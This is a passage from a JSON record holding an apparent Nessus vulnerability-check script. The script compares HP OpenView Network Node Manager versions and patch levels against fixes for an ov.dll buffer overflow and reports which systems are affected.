Patchlevel NNM_01213 or its equivalent.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/28\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:openview_network_node_manager\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:hp:openview_network_node_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Gain a shell remotely\");\n\n script_dependencies('hp_nnm_detect.nbin');\n script_require_keys('hp/hp_nnm');\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\n# Get the port number\nport = get_http_port(default:7510);\n\n# Get the version number and patch info\nversion = get_kb_item_or_exit('hp/hp_nnm/'+port+'/version');\nif (version !~ \"^[A-Z]+\\.[0-9]+\\.[0-9]+$\") exit(1, \"The version of Network Node Manager listening on port \"+port+\" is not recognized (\"+version+\").\");\nversion_split = split(version, sep:'.', keep:FALSE);\n\npatchlevel = get_kb_item('hp/hp_nnm/'+port+'/patchlevel');\n\n# Versions before B.07.53 are vulnerable, as are B.07.53 before NMM_01213\nif (\n version_split[0] == 'B' && \n int(version_split[1]) == 7 &&\n (\n int(version_split[2]) < 53 ||\n (int(version_split[2]) == 53 && (isnull(patchlevel) || patchlevel < 'NNM_01213'))\n )\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version;\n if (!isnull(patchlevel)) report += ' ' + patchlevel + ' (or equivalent)';\n report += '\\n Fixed version : B.07.53 Windows => NNM_01213' +\n '\\n Solaris => PSOV_03535' +\n '\\n Linux RedHatAS2.1 => LXOV_00121' +\n '\\n Linux RedHat4AS-x86_64 => LXOV_00122' +\n '\\n HP-UX (IA) => PHSS_42233' +\n '\\n HP-UX (PA) => PHSS_42232' +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse \n{\n errmsg = \"The Network Node Manager \" + version + \" \";\n if (!isnull(patchlevel)) errmsg += patchlevel + \" (or equivalent) \";\n errmsg += \" install listening on port \"+port+\" is not affected.\";\n exit(0, errmsg);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
